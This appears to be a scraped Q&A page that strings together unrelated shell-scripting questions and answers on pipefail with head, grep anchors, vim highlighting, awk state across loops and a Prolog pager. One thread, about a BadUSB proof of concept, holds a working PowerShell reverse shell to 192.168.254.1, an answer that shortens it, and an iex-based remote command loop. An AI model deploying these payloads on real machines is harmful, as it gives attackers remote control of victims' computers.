Imagine a call like this:
./generator.sh | head -1
This script is embedded in a larger context and it might happen that parts of it fail due to wrong configuration, etc. In such a case we do not want to continue with the script, so we set the pipefail option. But now we obviosuly face the problem that when head closes the receiving end, generator will fail. How can we mitigate the problem?
Is there a way to tell head to keep going, but to discard the input (this would be ideal, as we do not even want the early-exit semantics here).
I know that we can just disable/reenable pipefail for that piece, but I wonder if there is a shorter option.
? Is there a way to tell head to keep going, but to discard the input (this would be ideal, as we do not even want the early-exit semantics here).
There is sed: delete all except first line:
sed '1!d'
I think you could also do this, which captures the full output of generator.sh, before calling head
IT=$(./generator.sh)
echo "$IT" | head -1
Related
I want to be able to separate data by weeks, and the week is stated in a specific field on every line and would like to know how to use grep, cut, or anything else that's relevant JUST on that field the week is specified in while still being able to save the rest of the data that's being given to me. I need to be able to pipe the information into it via | because that's how the rest of my program needs it to be.
as the output gets processed, it should look something like this
asset.14548.extension 0
asset.40795.extension 0
asset.98745.extension 1
I want to be able to sort those names by their week number while still being able to keep the asset name in my output because the number of times that asset shows up is counted up, but my problem is I can't make my program smart enough to take just the "1" from the week number but smart enough to ignore the "1" located in the asset name.
UPDATE
The closest answer I found was
grep "^.........................$week" ;
That's good, but it relies on every string being the same length. Is there a way I can have it start from the right instead of the left? Because if so then that'd answer my question.
^ tells grep to start checking from the left and . tells grep to ignore whatever's in that space
I found what I was looking for in some documentation. Anchor matches!
grep "$week$" file
would output this if $week was 0
asset.14548.extension 0
asset.40795.extension 0
I couldn't find my exact question or a closely similar question with a simple answer, so hopefully it helps the next person scratching their head on this.
I am trying to implement a proof of concept BadUSB DigiSpark that can emulate a HID keyboard and open a reverse shell just using Windows default package (i.e. PowerShell and/or CMD).
What I have found so far:
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Taken from Week of PowerShell Shells - Day 1.
Despite working, the aforementioned code takes too long to be typed.
Is it possible to create a reverse shell with fewer lines of code?
284 characters. Yes you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray, best case already achieved.
:-| face for not even using the same tricks consistently within the same code. And for not giving any way to test it.
remove all the semicolons.
remove the space around -ne 0
remove -ne 0 because numbers cast to true and 0 casts to false
single character variable names
drop port 55555 to 5555
Change byte array from
[byte[]]$bt=0..255|%{0}
$b=[byte[]]'0'*256 # does it even need to be initialized to 0? Try without
Nest that into the reading call because who cares if it gets reinitialized every read.
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
#becomes
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
You can call [text.encoding]::ASCII.GetString($b) directly, but why ASCII? If it works if you can drop the encoding, then do
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
#becomes
$d=-join[char[]]$b
but you're only using that to call iex so put it there and don't use a variable for it. And do similar to make the byte array without calling ASCII as well...
... and: 197 chars, 30% smaller:
$t=(new-object Net.Sockets.TCPClient("192.168.254.1",5555)).GetStream()
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
$t.Write(($s=[byte[]][char[]](iex(-join[char[]]$b)2>&1)),0,$s.Length)}
Assuming it works, with no way to test it, it probably won't.
Edit: I guess if you can change the other side completely, then you could make it so the client would use JSON to communicate back and forth, and do a tight loop of
$u='192.168.254.1:55555';while(1){irm $u -m post -b(iex(irm $u).c)}
and your server would have to have the command ready in JSON like {'c':'gci'} and also accept a POST of the reply...
untested. 67 chars.
I am yad'fying an alarm script I use from the terminal multiple times a day for quick reminders. Anyway, this var assignment:
killOrSnz=$((sleep .1 ; wmctrl -r yadAC -e 0,6,30,0,0) | yad --title yadAC --image="$imgClk" --text "Alarm:\n${am}" --form --field="Hit Enter key to stop the alarm\nor enter a number of minutes\nthe alarm should snooze." --button="gtk-cancel:1" --button="gtk-ok:0"|sed -r 's/^([0-9]{1,})\|[ ]*$/\1/')
is causing me grief. The var works fine, as intended, except that all of the code below it is no longer highlighted in my vim session, making my eyes hurt just to look at it never mind scan for problems or to make alterations.
I borrowed the idea of piping yad command thru wmctrl to gain better control over window geometry, which is great from another post on here, but there was of course no mention of the potential side-affects. I want to keep fine control over the window placement of apps, but it would just be nice to do so while maintaining document highlighting.
I did try to rearrange the pipe and subshell to see if I could get it to work another way that didn't interfere with my vim highlighting, but there was no love to be had any which way but this way.
It appears that VIM's parser is fooled by the $((, mistaking it for the start of an arithmetic expression rather than a command substitution whose first character is a parentheses. Since there is no matching )), the colorizer gets confused about what is what. Try adding an explicit space between the two open parens:
killOrSnz=$( (sleep .1; ... )
I am writing a shell script program in which I am internally calling an awk script. Here is my script below.
for FILE in `eval echo{0..$fileIterator}`
{
if(FILE == $fileIterator)
{
printindicator =1;
}
grep RECORD FILEARRAY[FILE]| awk 'for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}} END {if(printIndicator==1){for(element in XARRAY){print element >> FILE B}}'
I hope I am clear with my code . Please let me know if you need any other details.
ISSUE
My motivation in this program is to traverse through all the files an get the lines that has "XXXX" in all the files and store the lines in an array. That is what I am doing here. Finally I need to store the contents of the array variable into a file. I can store the contents at each and every step like the below
{if($i ~ XXXX) {XARRAY[$i]++; print XARRAY[$i] >> FILE B}}
But the reason behind not going to this approach is each time I need to do an I/O operation and for this the time taken is much and that is why I am converting that into inmemory everytime and then at last dumping the in memory array(XARRAY) into the file.
The problem I am facing here is that. The shell script calls the awk everytime, the data's are getting stored in the array(XARRAY) but for the next iteration, the previous content of XARRAY is getting deleted and it puts the new content as this assumes this as a new array. Hence at last when I print the contents, it prints only the lately updated XARRAY and not all the data that is expected from this.
SUGGESTIONS EXPECTED
1) How to make the awk script realize that the XARRAY is an old one and not the new one when it is being called everytime in each iteration.
2) One of the alternative is to do an I/O everytime. But I am not interested in this. Is there any other alternative other than this. Thank you.
This post involves combining shell script and awk script to solve a problem. This is very often a useful approach, as it can leverage the strengths of each, and potentially keep the code from getting ugly in either!
You can indeed "preserve state" with awk, with a simple trick: leveraging a coprocess from the shell script (bash, ksh, etc. support coprocess).
Such a shell script launches one instance of awk as a coprocess. This awk instance runs your awk code, which continuously processes its lines of input, and accumulates stateful information as desired.
The shell script continues on, gathering up data as needed, and passes data to the awk coprocess whenever ready. This can run in a loop, potentially blocking or sleeping, potentially acting as a long-running background daemon. Highly versatile!
In your awk script, you need a strategy for triggering the output of the stateful data it has been accumulating. The simplest, is to have an END{} action which triggers when awk stdin closes. If you need output data sooner than that, at each line of input the awk code has a chance to output its data.
I have successfully used this approach many times.
Ouch, can't tell if it is meant to be real or pseudocode!
You can't make awk preserve state. You would either have to save it to a temporary file or store it in a shell variable, the contents of which you'd pass to later invocations. But this is all too much hassle for what I understand you want to achieve.
I suggest you omit the loop, which will allow you to call awk only once with just some reordering. I assume FILE A is the FILE in the loop and FILE B is something external. The reordering would end up something very roughly like:
grep RECORD ${FILEARRAY[#]:0:$fileIterator} | awk 'for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}} END {for(element in XARRAY){print element >> FILEB}'
I move the filename expansion to the grep call and removed the whole printIndicator check.
It could all be done even more efficiently (the obvious one being removal of grep), but you provided too little detail to make early optimisation sensible.
EDIT: fixed the loop iteration with the info from the update. Here's a loopy solution, which is immune to new whitespace issues and too long command lines:
for FILE in $(seq 0 $fileIterator); do
grep RECORD "${FILEARRAY[$FILE]}"
done |
awk 'for(i=1;i<=NF;i++) {if($i ~ XXXX) {XARRAY[$i]++}} END {for(element in XARRAY){print element >> FILEB}'
It still runs awk only once, constantly feeding it data from the loop.
If you want to load the results into an array UGUGU, do the following as well (requires bash 4):
mapfile UGUGU < FILEB
results=$(for loop | awk{for(element in XARRAY)print element})..
I declared result as an array so for every "element" that is being printed it should store in results[1], results[2].
But instead of this, it is performing the below ...
Lets assume
element = "I am fine"(First iteration of for loop),
element = "How are you" (Second iteration of for loop).
My expected result in accordance to this is,
results[1]= "I am fine" and results[2] = "How are you" ,
but the output I am getting is results[1]= "I" results[2]= "am". I dont know why it is delimiting by space .. Any suggestions regarding this
The typical workflow in unix is to use a pipeline of filters ending up with a pager such as less. E.g. (omitting arguments)
grep | sed | awk | less
Now, one of the typical workflows in the swi-prolog's command line is asking it to give the set of solutions for a given conjunction like
foo(X),bar(X, Y),qux(buz, Y).
It readily gives me the set of soutions. Which can be much longer than the terminal window. Or a single query
give_me_long_list(X).
can give a very long list again not fitting on the screen. So I constantly find myself in situations where I want to slap |less at the end of the line.
What I am looking for is a facility to open in a pager a set of solutions or just a single large term. Something similar to:
give_me_long_list(X), pager(X).
or
pager([X,Y], (foo(X),bar(X, Y),qux(buz, Y))).
This is not a complete solution, but wouldn't it be rather easy to write your own pager predicate? Steps:
Create temp file
dump X into temp file with the help of these or those predicates
(I haven't done any I/O with Prolog yet, but it doesn't seem too messy)
make a system call to less <tempfile>